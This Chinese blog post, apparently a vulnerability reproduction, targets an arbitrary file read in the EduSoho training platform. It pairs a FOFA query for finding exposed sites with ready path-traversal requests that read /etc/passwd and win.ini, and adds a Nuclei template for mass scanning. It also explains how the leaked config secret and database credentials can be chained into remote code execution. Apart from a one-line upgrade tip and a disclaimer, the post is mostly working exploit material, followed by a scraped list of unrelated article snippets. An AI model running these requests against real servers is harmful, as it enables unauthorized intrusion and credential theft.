zkzq
zkzq

【漏洞复现】EduSoho教培系统 任意文件读取

该文章由掌控安全学院——1782814368投稿

【产品介绍】

EduSoho企培系统,基于EduSoho教育云PaaS平台的底层技术打造,专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案,专注人才培养、专注组织建设,帮助企业构建学习型组织,促成终身学习、实现快速发展。

【漏洞介绍】

该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE

【资产测绘Query】

fofa语法:

 
  
     
   
  1. title="Powered By EduSoho" || body="Powered by EduSoho" || (body="Powered By EduSoho" && body="var app")
    2.  
  
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第1张图片
 
  
【产品界面】
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第2张图片
 
  
【漏洞复现】
 
  
【poc】
 
  
linux系统:
 
  
 
  
     
   
  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
    2.  
   
  2. Host: 127.0.0.1
    3.  
  
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第3张图片
 
  

 windows系统:
 
  
 
  
     
   
  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini HTTP/1.1
    2.  
   
  2. Host: 127.0.0.1
    3.  
  
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第4张图片
 
  
【Nuclei-Poc】
 
  
 
  
     
   
  1. id: EduSoho_arbitrary_file_read_crossplatform
    2.  
   
  2.  
   
  3. info:
    4.  
   
  4. name: EduSoho Cross-Platform Directory Traversal Vulnerability
    5.  
   
  5. author: yourname
    6.  
   
  6. severity: critical
    7.  
   
  7. description:
    8.  
   
  8. tags: directory-traversal,cve,critical
    9.  
   
  9.  
   
  10. requests:
    11.  
   
  11. - method: GET
    12.  
   
  12. path:
    13.  
   
  13. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"
    14.  
   
  14. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini"
    15.  
   
  15.  
   
  16. matchers-condition: and
    17.  
   
  17. matchers:
    18.  
   
  18. - type: word
    19.  
   
  19. part: body
    20.  
   
  20. words:
    21.  
   
  21. - "root:x:0:0:root:/root:/bin/bash" # Unix-like systems
    22.  
   
  22. - "[extensions]" # Windows systems
    23.  
   
  23. condition: or
    24.  
   
  24.  
   
  25. - type: status
    26.  
   
  26. status:
    27.  
   
  27. - 200
    28.  
   
  28.  
   
  29. - type: word
    30.  
   
  30. part: body
    31.  
   
  31. negative: true
    32.  
   
  32. words:
    33.  
   
  33. - "empty file"
    34.  
   
  34. condition: and
    35.  
   
  35.  
   
  36. - type: word
    37.  
   
  37. part: body
    38.  
   
  38. negative: true
    39.  
   
  39. words:
    40.  
   
  40. - "\"success\": 0"
    41.  
   
  41. condition: and
    42.  
  
 
  
【验证】
 
  
.\nuclei -l 1.txt -t 4.yaml
 
  
 
  
【漏洞复现】EduSoho教培系统 任意文件读取_第5张图片
 
  
【修复建议】
 
  
1:更新到最新版本
 
  
申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。
 
  
免费领取安全学习资料包!
 
  
渗透工具
 
  
 
  
技术文档、书籍
 
  
 
 
  
 
  
面试题
 
  
帮助你在面试中脱颖而出
 
  
 
  
视频
 
  
基础到进阶
 
  
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
 
  
 
 
  
 
  
应急响应笔记
 
  
 
  
学习路线
 
  
 
  
 
 
 


                            

                        

                    

                    
                    

                    
                    
                    

                

                

                    
                

            

        

    

    

        
你可能感兴趣的:(漏洞,漏洞挖掘,信息泄露)

        

            

                
    
                    
  • 可编程电子安全相关系统_编程中的安全生态系统概述
                        danpu0978
编程语言pythonjava人工智能linux
                        
    可编程电子安全相关系统就像近年来的情况一样,安全漏洞已越来越被接受。仅以最近的Equifax违规为例。无论我们在哪里看,似乎总有人会遭受某种形式的恶意攻击或其他形式的攻击。尽管我们最近想到了最近的漏洞,但我还是想花一点时间来概述有关软件开发的安全生态系统。我将从建设性和积极的角度介绍您可以做的一些关键事情,以提高您的应用程序的安全性,以应对安全漏洞。为此,我将研究四个关键领域。他们将主要讨论具体的
    
                    
    • 
                    
  • Docker容器升级MySQL
                        Java王小怪
dockermysql容器
                        
    目录服务升级密码重置1、找到挂载配置文件2、重启服务3、容器交互4、修改密码5、还原配置文件前言:由于项目需要,我们使用docker-compose启动的MySQL服务,原先版本为5.7.3,在服务扫描过程中,发现此版本的MySQL存在漏洞,遂决定对MySQL版本进行升级。服务升级由于库中数据还存在不少,我们并没有把原先MySQL的容器进行删除重新搞个新的,只是升级版本可以做到无痛割接。由于我的M
    
                    
    • 
                    
  • Apache Seata < 2.3.0 raft反序列化漏洞
                        墨菲安全
ApacheSeata反序列化漏洞CVE-2025-32897
                        
    【高危】ApacheSeata<2.3.0raft反序列化漏洞漏洞描述ApacheSeata(incubating)是一款开源的分布式事务解决方案,用于在微服务架构下提供高性能和简单易用的分布式事务服务。受影响版本中,SeataServer的Raft模块的CustomDeserializer直接通过Class.forName()加载用户可控的类名,未做安全校验,攻击者可借此利用服务端已有的恶意链实
    
                    
    • 
                    
  • Paper Reading《SoK: Prudent Evaluation Practices for Fuzzing》
                        小苑同学
安全性测试网络安全
                        
    论文链接:https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=10646824IEEESSP20241Introduction(背景意义)模糊测试是发现软件漏洞的高效方法,被Meta、Google等企业广泛应用,且大量学术研究持续改进其技术(如覆盖反馈、领域扩展)。过去六年(2018-2023)中,顶级安全与软件工程会议上发表了超280
    
                    
    • 
                    
  • 便利的隐形代价?智能设备正在“偷听”你的生活——物联网时代的隐私深度危机
                        二十十十十十
生活
                        
    引子:从“智能冰箱”泄露百万信用卡说起2023年,某知名品牌智能冰箱被曝存在严重漏洞。黑客通过入侵其联网系统,不仅能窃取用户存储在App中的支付信息,更可远程激活冰箱内置麦克风,持续监听厨房对话。事件导致超百万用户数据泄露,成为物联网隐私威胁的典型案例。隐私窃取:不只是麦克风这么简单物联网设备正成为隐私泄露的重灾区:1、无处不在的“感官”麦克风监听:智能音箱、电视、手机、甚至部分智能家电时刻准备响
    
                    
    • 
                    
  • PyPI仓库 loggutils 组件内嵌恶意代码
                        

                        
    【高危】PyPI仓库loggutils组件内嵌恶意代码漏洞描述当用户安装受影响版本的loggutilsPython组件包时会窃取用户主机浏览器、剪贴板、系统文件等信息,并窃取键盘记录和摄像头截图,并对用户主机进行远控。MPS编号MPS-tzsc-gm4v处置建议强烈建议修复发现时间2025-06-30投毒仓库pip投毒类型恶意代码利用成本低利用可能性中影响范围影响组件受影响的版本最小修复版本log
    
                    
    • 
                    
  • NPM组件 betsson 等窃取主机敏感信息
                        墨菲安全
npm前端node.jsNPM组件投毒软件供应链安全主机信息窃取
                        
    【高危】NPM组件betsson等窃取主机敏感信息漏洞描述当用户安装受影响版本的betsson组件包时会窃取用户的主机名、用户名、工作目录、IP地址等信息并发送到攻击者可控的服务器地址。MPS编号MPS-2nrw-lifd处置建议强烈建议修复发现时间2025-06-30投毒仓库npm投毒类型主机信息收集利用成本低利用可能性中影响范围影响组件受影响的版本最小修复版本betsson[1.0.0,99.
    
                    
    • 
                    
  • Web学习:SQL注入之联合查询注入
                        kaikaile1995
前端学习sql
                        
    SQL注入(SQLInjection)是一种常见且危害极大的Web安全漏洞,攻击者可以通过构造恶意的SQL语句窃取、篡改数据库中的数据,甚至控制整个数据库服务器。本文将深入探讨SQL注入的一个重要变种——联合查询注入(Union-basedSQLInjection),介绍其原理、常见攻击方式、以及防御措施。SQL注入概述SQL注入是指将恶意的SQL代码插入到应用程序的输入字段中,使得这些代码被意外
    
                    
    • 
                    
  • [ vulhub漏洞复现篇 ] Drupal XSS漏洞 (CVE-2019-6341)
                        寒蝉听雨[原ID_PowerShell]
[靶场实战]vulhubvulhub漏洞复现DrupalXSS漏洞CVE-2019-6341渗透测试网络安全
                        
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!文章目录博主介绍一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2019-6341环境2、启动CVE-20
    
                    
    • 
                    
  • js 允许生成特殊的变量名 基于字符集编码混淆的 XSS 绕过漏洞 -- Google 2025 Lost In Transliteration
                        A5rZ
网络安全
                        
    题目实现了一个字符转换工具在/file路由用户可以通过ct参数自定义Content-Type//文件路由-提供静态文件服务(JS和CSS),支持内容类型验证app.MapGet("/file",(stringfilename="",string?ct=null,string?q=null)=>{//根据文件名查找对应的模板文件string?template=FindFile(filename);i
    
                    
    • 
                    
  • 揭秘网络安全:数字世界的隐形防线
                        

                        
    目录一、网络安全:数字时代的关键锁钥二、常见网络安全威胁大起底2.1网络诈骗:狡猾的数字陷阱2.2恶意软件:隐匿的数字刺客2.3数据泄露:隐私的无声暴露2.4网络钓鱼:伪装的数字猎手三、筑牢网络安全防线的策略3.1提升安全意识:思想上的防火墙3.2强化密码管理:账户的坚固盾牌3.3谨慎使用公共网络:公共场合的安全警惕3.4定期更新软件和系统:修复漏洞的及时补丁3.5开启防护工具:数字世界的安全卫士
    
                    
    • 
                    
  • 页面弹窗≠有效漏洞:揭秘 XSS 中的沙箱与子域名隔离
                        vortex5
web安全xss安全前端
                        
    前言跨站脚本攻击(Cross-SiteScripting,简称XSS)是一种常见的安全漏洞,攻击者通过将恶意脚本注入到看似安全可靠的网站中,影响其他用户的正常使用。假设你使用了一个简单的XSS有效载荷,比如alert(1),它会在执行时弹出一个窗口。虽然这个弹窗能直观地告诉你代码被触发,但它无法准确揭示一个关键信息:有效载荷究竟是在哪里执行的?相比之下,使用alert(document.domai
    
                    
    • 
                    
  • AI编程工具深度对比:腾讯云代码助手CodeBuddy、Cursor与通义灵码
                        scuter_yu
AI编程云计算
                        
    腾讯云代码助手CodeBuddy智能代码补全:基于上下文和编辑行为预测代码,支持行内补全、函数块生成及注释转代码,覆盖200+编程语言和框架,可减少70%以上的键盘输入。Craft智能体:支持自然语言驱动的多文件协同开发,能自动拆解任务并生成关联页面代码,还支持从用户需求转到研发需求,最后拆分成迭代执行。代码评审与优化:从代码规范性、性能优化、安全漏洞等多个维度对代码进行全面审查,生成详细报告并提
    
                    
    • 
                    
  • 网络安全等级保护(等保)全面指南
                        兢谨网安
企业安全web安全网络安全渗透测试网络安全网络攻击模型
                        
    一、等保核心认知1.等保定义与法律地位定义:等保是国家对信息系统按重要性分级保护的基础制度,涵盖定级、备案、建设整改、测评、检查五个阶段。法律强制:《网络安全法》第21条明确要求网络运营者履行等保义务,违者最高罚款100万元(单位)及10万元(责任人)。2.甲方核心价值合规避险:金融、医疗、教育等行业监管明确要求等保资质(如支付系统需二级以上)。风险管控:通过年检式测评(三级每年1次)发现漏洞,避
    
                    
    • 
                    
  • 【蓝队】XX集团股份有限公司体系化监测挖掘抵御0day漏洞防护技战法|护网|高级|研判|监测|hw
                        chenyzzz
蓝队网络安全网络安全系统安全web安全安全架构0day
                        
    2025重点关注MetaCRM客户关系管理系统sendfile.jsp任意文件上传MetaCRM客户关系管理系统sendsms.jsp任意文件上传AgentSyste代理商管理系统login.actionStruts2远程代码执行用友NClistUserSharingEvents存在SQL注入浪潮云财务系统存在远程代码执行一、工作背景与现状分析0day漏洞是指尚未被漏洞所在软硬件系统的厂商或开发者
    
                    
    • 
                    
  • 揭秘代码的安全漏洞是如何被发现的:代码扫描工具fortify的详细介绍
                        G探险者
javajavafortify漏洞扫描
                        
    前言在许多对安全性有所关注的公司中,代码安全扫描已成为一项关键的实践。但是,面对频繁出现的安全漏洞升级,大家可能会感到困惑和头疼。那么,这些令人不安的漏洞究竟是如何被发现的呢?今天我们将为大家揭示安全漏洞发现的奥秘。fortify概述Fortify是一款广泛使用的静态应用程序安全测试(SAST)工具,由MicroFocus开发和维护。用Java语言开发的。具有良好的跨平台兼容性,可以支持多种操作系
    
                    
    • 
                    
  • 【代码审计】安全审核常见漏洞修复策略
                        秋说
Java代码审计网络安全代码审计
                        
    文章目录1.异常信息泄露修复建议不推荐用法推荐用法2.文件上传漏洞错误示例(缺乏校验)安全示例(含格式/扩展名校验)3.SQL注入漏洞(MyBatis${})示例修复建议4.生成组件间接依赖生成依赖树建议5.间接依赖组件的漏洞什么是间接依赖后端修复1后端修复2前端修复1前端修复26.XSS(跨站脚本攻击)错误示例(存在风险)安全示例(自动转义)修复建议7.接口未鉴权修复建议8.路径遍历漏洞错误示例
    
                    
    • 
                    
  • 二次开发源码 借贷系统uniapp/借贷认证系统/小额信贷系统/工薪贷APP/资金贷系统h5
                        csdndddsd
uniapp借贷系统开发小额贷系统app工薪贷系统安装搭建信用贷认证系统h5资金贷系统安装搭建教程借贷系统安装搭建借贷系统二次开发
                        
    前端:UNIAPP后端:ThinkPHP数据库:Mysql前端使用的uniapp可以打包APPH5小程序系统提供了完善的网络借贷体系,为金融中介平台提供从获客到贷后管理全流程服务,解决了借贷手续繁琐、流程缓慢等问题此源码为运营中版本,具有极高稳定性,防注入,防攻击,修复全部已知后门漏洞仅供学习演示、二次开发专用,禁止一切违法行为的利用!可提现金额(元)¥{{qbMoney}}充值提现余额明细余额变
    
                    
    • 
                    
  • ROP和Ret2libc漏洞
                        卍king卐然
web安全经验分享ROP攻击
                        
    一、ROP攻击原理ROP全称为Return-orientedProgramming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。ROP的核心思想:攻击者扫描已有的动态链接库和可执行文件,提取出可以利用的指令片段(gadget),这些指令片
    
                    
    • 
                    
  • 黑客入门 | 用ROP和shellcode攻击SolarWinds Serv-U SSH漏洞
                        廖致君
安全网络攻击模型
                        
    (备注:黑客Hacker并不等同于信息安全罪犯。)最近花了些时间学习bufferoverflow安全漏洞,做了大名鼎鼎的CSAPP课程里的attacklab,学到了return-orientedprogramming(ROP)这种让我大开眼界的进攻方式。于是想要趁热打铁,来详细研究一下现实世界中的黑客进攻案例。本篇文章挑选的是2021年SolarWindsServ-UFTP软件中的漏洞,记录编号C
    
                    
    • 
                    
  • 【Go语言成长之路】 模糊测试
                        风华同学
Go语言成长之路golang开发语言后端单元测试
                        
    文章目录模糊测试一、前提二、创建项目三、添加待测试代码四、添加单元测试五、添加模糊测试模糊测试本教程介绍了Go中模糊测试的基础知识。通过模糊测试,随机数据会针对您的测试运行,以尝试找到漏洞或导致崩溃的输入。可以通过模糊测试发现的漏洞示例包括SQL注入、缓冲区溢出、拒绝服务和跨站点脚本攻击。注:Go语言中模糊测试已经内置,具体可以参考:GoFuzzingdocs,将来还会添加更多功能。一、前提Go1
    
                    
    • 
                    
  • 什么是护网行动
                        鹿鸣天涯
红蓝攻防安全
                        
    一、什么是护网行动?护网行动是以公安部牵头的,用以评估企事业单位的网络安全的活动。具体实践中。公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。“护网行动”是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越
    
                    
    • 
                    
  • Python爬虫实战:研究sanitize库相关技术
                        ylfhpy
爬虫项目实战python爬虫网络开发语言安全sanitize
                        
    1.引言1.1研究背景与意义在当今数字化时代,互联网已成为人们获取信息、交流互动的重要平台。随着Web2.0技术的发展,用户生成内容(UGC)、社交媒体嵌入、第三方插件等功能极大丰富了网页的内容和交互性,但也带来了严峻的安全挑战。根据Web应用安全联盟(WAS)的统计数据,2025年全球范围内因网页安全漏洞导致的数据泄露事件超过15万起,造成的经济损失高达250亿美元。其中,跨站脚本攻击(XSS)
    
                    
    • 
                    
  • 零信任架构——重构企业安全边界的新范式
                        月_o9
网络安全
                        
    零信任架构——重构企业安全边界的新范式(字数:998)传统边界的崩塌与信任危机防火墙与VPN构筑的“城堡护城河”模型在云原生与远程办公时代彻底瓦解。当数据散布于公有云、边缘设备与SaaS平台,当供应链攻击可穿透层层防护,“内部可信”的假设已成为最大安全漏洞。零信任(ZeroTrust)的核心哲学正是:永不信任,持续验证(NeverTrust,AlwaysVerify)。它并非单一技术,而是以身份为
    
                    
    • 
                    
  • 高效主机发现与端口枚举:fscan工具实战指南
                        Bruce_xiaowei
笔记总结经验网络安全fscan信息搜集
                        
    高效主机发现与端口枚举:fscan工具实战指南在网络安全领域,主机发现与端口枚举是渗透测试和信息收集的基础环节。本文将深入探讨fscan这一高效工具的核心技术原理与实战应用,帮助你快速掌握网络扫描的核心技能。一、fscan与Nmap工具对比特性fscanNmap开发语言Python3C++主要功能主机探测、端口扫描、漏洞检测主机发现、服务识别、OS检测爆破能力内置弱口令检测需配合其他工具扫描速度极
    
                    
    • 
                    
  • Docker 镜像制作
                        Ris Hen
dockerdocker
                        
    目录镜像制作及原因快照方式制作镜像Dockerfile制作镜像为什么需要DockerfileDockerfile指令常见问题镜像制作及原因镜像制作是因为某种需求,官方的镜像无法满足需求,需要我们通过一定手段来自定义镜像来满足要求。制作镜像往往因为以下原因1.编写的代码如何打包到镜像中直接跟随镜像发布2.第三方制作的内容安全性未知,如含有安全漏洞3.特定的需求或者功能无法满足,如需要给数据库添加审计
    
                    
    • 
                    
  • 超详细【WEB应用安全测试指南--蓝队安全测试1】--超级详细的安全测试渗透性测试知识点--可直接上手进行对应的安全测试!!!!!!
                        生活De°咸鱼
安全专栏前端安全性测试web安全安全威胁分析
                        
    一、概述1.1、编写目的结合公司的内部人员培养体系,本手册旨在为安全测试人员提供测试指导,安全测试人员通过查阅该指南可快速掌握Web应用安全测试,提高工作能力。1.2、使用范围本文适用于Web应用安全测试人员1.3、注意事项本文旨在为测试人员提供漏洞测试的基本思路,随着安全技术的发展,更多的新漏洞和测试方法将被爆出,安全测试人员应该具备不断学习新知识的能力。二、Web应用安全测试指南2.1、认证授
    
                    
    • 
                    
  • 蓝队溯源反制一键利用工具
                        网络安全进阶
渗透测试工具web安全渗透测试网络安全渗透工具
                        
    蓝队利器、溯源反制、NPS漏洞利用、NPSexp、NPSpoc、Burp插件、一键利用最近做攻防演练发现了很多内网穿透的工具,其中最多的就是nps,红队老哥好像还挺喜欢这个的,真的是多,每天导出攻击IP,浅浅扫一下端口,基本都能发现这个nps。贼多NPS存在一个身份验证的缺陷,无需登录,直接进后台,后台功能点全都可以用。具体利用是伪造两个参数auth_key、timestamp。但是这俩参数的生命
    
                    
    • 
                    
  • 不是只有写稿能用AI!教你用AI“模拟审稿人”帮论文过关
                        学境思源AcademicIdeas
AI写作学境思源ChatGPT人工智能
                        
    在AI辅助写作火遍学术圈之后,学境思源,越来越多作者开始发现:AI的真正威力,并不只是帮你一键生成论文初稿!“写”,而是可以反过来“像审稿人一样看你的论文”。acaids.com。这种“反向应用”,正成为提高论文录用率的关键利器。今天这篇文章就告诉你:如何用AI模拟审稿人视角,检查论文的逻辑漏洞、结构混乱、语言问题,甚至帮助你发现数据论证不足,提前做出修改。我们会重点介绍Paperpal、Writ
    
                    
    • 
                    
  • Selenium测试安全策略:防止逆向工程
                        软件工程实践
软件工程最佳实践AI软件构建大数据系统架构selenium网络tcp/ipai
                        
    Selenium测试安全策略:防止逆向工程关键词:Selenium自动化测试、逆向工程、代码安全、敏感信息保护、测试脚本防护摘要:本文从Selenium自动化测试的实际场景出发,深入解析测试脚本面临的逆向工程风险(如敏感信息泄露、测试逻辑被破解),通过生活案例类比技术概念,系统讲解代码混淆、敏感信息加密、日志脱敏等核心安全策略,并提供可落地的实战代码与工具推荐,帮助测试人员构建“防逆向”的安全测试
    
                    
    • 
                                
  • ViewController添加button按钮解析。(翻译)
                                    张亚雄
c
                                    
    <div class="it610-blog-content-contain" style="font-size: 14px"></div>//  ViewController.m 
//  Reservation software 
// 
//  Created by 张亚雄 on 15/6/2. 

    
                                
    • 
                                
  • mongoDB 简单的增删改查
                                    开窍的石头
mongodb
                                    
       在上一篇文章中我们已经讲了mongodb怎么安装和数据库/表的创建。在这里我们讲mongoDB的数据库操作 
      在mongo中对于不存在的表当你用db.表名 他会自动统计 
下边用到的user是表明,db代表的是数据库 
 
      添加(insert): 

    
                                
    • 
                                
  • log4j配置
                                    0624chenhong
log4j
                                    
    1) 新建java项目 
2) 导入jar包,项目右击,properties—java build path—libraries—Add External jar,加入log4j.jar包。 
3) 新建一个类com.hand.Log4jTest 
 

package com.hand;

import org.apache.log4j.Logger;


public class 
    
                                
    • 
                                
  • 多点触摸(图片缩放为例)
                                    不懂事的小屁孩
多点触摸
                                    
    多点触摸的事件跟单点是大同小异的,上个图片缩放的代码,供大家参考一下 
 


import android.app.Activity;
import android.os.Bundle;
import android.view.MotionEvent;
import android.view.View;
import android.view.View.OnTouchListener
    
                                
    • 
                                
  • 有关浏览器窗口宽度高度几个值的解析
                                    换个号韩国红果果
JavaScripthtml
                                    
    1 元素的 offsetWidth 包括border padding  content  整体的宽度。 
clientWidth  只包括内容区 padding 不包括border。 
clientLeft =  offsetWidth -clientWidth  即这个元素border的值 
offsetLeft  若无已定位的包裹元素
    
                                
    • 
                                
  • 数据库产品巡礼:IBM DB2概览
                                    蓝儿唯美
db2
                                    
    IBM DB2是一个支持了NoSQL功能的关系数据库管理系统,其包含了对XML,图像存储和Java脚本对象表示(JSON)的支持。DB2可被各种类型的企 业使用,它提供了一个数据平台,同时支持事务和分析操作,通过提供持续的数据流来保持事务工作流和分析操作的高效性。 DB2支持的操作系统 
DB2可应用于以下三个主要的平台: 
  
 
 工作站,DB2可在Linus、Unix、Windo
    
                                
    • 
                                
  • java笔记5
                                    a-john
java
                                    
    控制执行流程: 
1,true和false 
   利用条件表达式的真或假来决定执行路径。例:(a==b)。它利用条件操作符“==”来判断a值是否等于b值,返回true或false。java不允许我们将一个数字作为布尔值使用,虽然这在C和C++里是允许的。如果想在布尔测试中使用一个非布尔值,那么首先必须用一个条件表达式将其转化成布尔值,例如if(a!=0)。 
2,if-els
    
                                
    • 
                                
  • Web开发常用手册汇总
                                    aijuans
PHP
                                    
    一门技术,如果没有好的参考手册指导,很难普及大众。这其实就是为什么很多技术,非常好,却得不到普遍运用的原因。
 正如我们学习一门技术,过程大概是这个样子:
 ①我们日常工作中,遇到了问题,困难。寻找解决方案,即寻找新的技术;
 ②为什么要学习这门技术?这门技术是不是很好的解决了我们遇到的难题,困惑。这个问题,非常重要,我们不是为了学习技术而学习技术,而是为了更好的处理我们遇到的问题,才需要学习新的
    
                                
    • 
                                
  • 今天帮助人解决的一个sql问题
                                    asialee
sql
                                    
                今天有个人问了一个问题,如下: 
type     AD      value           
A  
    
                                
    • 
                                
  • 意图对象传递数据
                                    百合不是茶
android意图IntentBundle对象数据的传递
                                    
    学习意图将数据传递给目标活动; 初学者需要好好研究的 
   
   1,将下面的代码添加到main.xml中 
   
<?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http:/
    
                                
    • 
                                
  • oracle查询锁表解锁语句
                                    bijian1013
oracleobjectsessionkill
                                    
    一.查询锁定的表 
如下语句,都可以查询锁定的表 
语句一: 
select a.sid,
       a.serial#,
       p.spid,
       c.object_name,
       b.session_id,
       b.oracle_username,
       b.os_user_name
  from v$process p, v$s
    
                                
    • 
                                
  • mac osx 10.10 下安装 mysql 5.6 二进制文件[tar.gz]
                                    征客丶
mysqlosx
                                    
    场景:在 mac osx 10.10 下安装 mysql 5.6 的二进制文件。 
 
环境:mac osx 10.10、mysql 5.6 的二进制文件 
 
步骤:[所有目录请从根“/”目录开始取,以免层级弄错导致找不到目录] 
1、下载 mysql 5.6 的二进制文件,下载目录下面称之为 mysql5.6SourceDir; 
下载地址:http://dev.mysql.com/downl
    
                                
    • 
                                
  • 分布式系统与框架
                                    bit1129
分布式
                                    
    RPC框架 Dubbo 
什么是Dubbo 
  
Dubbo是一个分布式服务框架,致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。其核心部分包含:    远程通讯: 提供对多种基于长连接的NIO框架抽象封装,包括多种线程模型,序列化,以及“请求-响应”模式的信息交换方式。    集群容错: 提供基于接
    
                                
    • 
                                
  • 那些令人蛋痛的专业术语
                                    白糖_
springWebSSOIOC
                                    
     
 spring 
 
【控制反转(IOC)/依赖注入(DI)】: 
由容器控制程序之间的关系,而非传统实现中,由程序代码直接操控。这也就是所谓“控制反转”的概念所在:控制权由应用代码中转到了外部容器,控制权的转移,是所谓反转。 
简单的说:对象的创建又容器(比如spring容器)来执行,程序里不直接new对象。 
 
 Web 
 
【单点登录(SSO)】:SSO的定义是在多个应用系统中,用户
    
                                
    • 
                                
  • 《给大忙人看的java8》摘抄
                                    braveCS
java8
                                    
    函数式接口:只包含一个抽象方法的接口 
lambda表达式:是一段可以传递的代码 
  
  
  
你最好将一个lambda表达式想象成一个函数,而不是一个对象,并记住它可以被转换为一个函数式接口。 
事实上,函数式接口的转换是你在Java中使用lambda表达式能做的唯一一件事。 
  
方法引用:又是要传递给其他代码的操作已经有实现的方法了,这时可以使
    
                                
    • 
                                
  • 编程之美-计算字符串的相似度
                                    bylijinnan
java算法编程之美
                                    
    

public class StringDistance {

	/**
	 * 编程之美 计算字符串的相似度
	 * 我们定义一套操作方法来把两个不相同的字符串变得相同,具体的操作方法为:
	 * 1.修改一个字符(如把“a”替换为“b”);
	 * 2.增加一个字符(如把“abdd”变为“aebdd”);
	 * 3.删除一个字符(如把“travelling”变为“trav
    
                                
    • 
                                
  • 上传、下载压缩图片
                                    chengxuyuancsdn
下载
                                    
    /**
	 * 
	 * @param uploadImage --本地路径(tomacat路径)
	 * @param serverDir   --服务器路径
	 * @param imageType   --文件或图片类型
	 * 此方法可以上传文件或图片.txt,.jpg,.gif等
	 */
	public void upload(String uploadImage,Str
    
                                
    • 
                                
  • bellman-ford(贝尔曼-福特)算法
                                    comsci
算法F#
                                    
    Bellman-Ford算法(根据发明者 Richard Bellman 和 Lester Ford 命名)是求解单源最短路径问题的一种算法。单源点的最短路径问题是指:给定一个加权有向图G和源点s,对于图G中的任意一点v,求从s到v的最短路径。有时候这种算法也被称为 Moore-Bellman-Ford 算法,因为 Edward F. Moore zu 也为这个算法的发展做出了贡献。 
 
与迪科
    
                                
    • 
                                
  • oracle ASM中ASM_POWER_LIMIT参数
                                    daizj
ASMoracleASM_POWER_LIMIT磁盘平衡
                                    
    ASM_POWER_LIMIT 
该初始化参数用于指定ASM例程平衡磁盘所用的最大权值,其数值范围为0~11,默认值为1。该初始化参数是动态参数,可以使用ALTER  SESSION或ALTER  SYSTEM命令进行修改。示例如下: 
 
SQL>ALTER  SESSION  SET   Asm_power_limit=2; 

    
                                
    • 
                                
  • 高级排序:快速排序
                                    dieslrae
快速排序
                                    
    
    public void quickSort(int[] array){
        this.quickSort(array, 0, array.length - 1);
    }
    
    public void quickSort(int[] array,int left,int right){
        if(right - left <= 0
    
                                
    • 
                                
  • C语言学习六指针_何谓变量的地址 一个指针变量到底占几个字节
                                    dcj3sjt126com
C语言
                                    
    # include <stdio.h>

int main(void)
{
	/*
	1、一个变量的地址只用第一个字节表示
	2、虽然他只使用了第一个字节表示,但是他本身指针变量类型就可以确定出他指向的指针变量占几个字节了
	3、他都只存了第一个字节地址,为什么只需要存一个字节的地址,却占了4个字节,虽然只有一个字节,
		但是这些字节比较多,所以编号就比较大,
		
    
                                
    • 
                                
  • phpize使用方法
                                    dcj3sjt126com
PHP
                                    
    phpize是用来扩展php扩展模块的,通过phpize可以建立php的外挂模块,下面介绍一个它的使用方法,需要的朋友可以参考下 
安装(fastcgi模式)的时候,常常有这样一句命令: 
代码如下: 
/usr/local/webserver/php/bin/phpize 
  
一、phpize是干嘛的? 
phpize是什么? 
phpize是用来扩展php扩展模块的,通过phpi
    
                                
    • 
                                
  • Java虚拟机学习 - 对象引用强度
                                    shuizhaosi888
JAVA虚拟机
                                    
     
 本文原文链接:http://blog.csdn.net/java2000_wl/article/details/8090276 转载请注明出处! 
 无论是通过计数算法判断对象的引用数量,还是通过根搜索算法判断对象引用链是否可达,判定对象是否存活都与“引用”相关。 
 引用主要分为 :强引用(Strong Reference)、软引用(Soft Reference)、弱引用(Wea
    
                                
    • 
                                
  • .NET Framework 3.5 Service Pack 1(完整软件包)下载地址
                                    happyqing
.net下载framework
                                    
      
Microsoft .NET Framework 3.5 Service Pack 1(完整软件包)  
http://www.microsoft.com/zh-cn/download/details.aspx?id=25150 
Microsoft .NET Framework 3.5 Service Pack 1 是一个累积更新,包含很多基于 .NET Framewo
    
                                
    • 
                                
  • JAVA定时器的使用
                                    jingjing0907
javatimer线程定时器
                                    
    1、在应用开发中,经常需要一些周期性的操作,比如每5分钟执行某一操作等。 
对于这样的操作最方便、高效的实现方式就是使用java.util.Timer工具类。 
privatejava.util.Timer timer; 
timer = newTimer(true); 
timer.schedule( 
newjava.util.TimerTask() { public void run() 

    
                                
    • 
                                
  • Webbench
                                    流浪鱼
webbench
                                    
    首页下载地址 http://home.tiscali.cz/~cz210552/webbench.html 
Webbench是知名的网站压力测试工具,它是由Lionbridge公司(http://www.lionbridge.com)开发。 
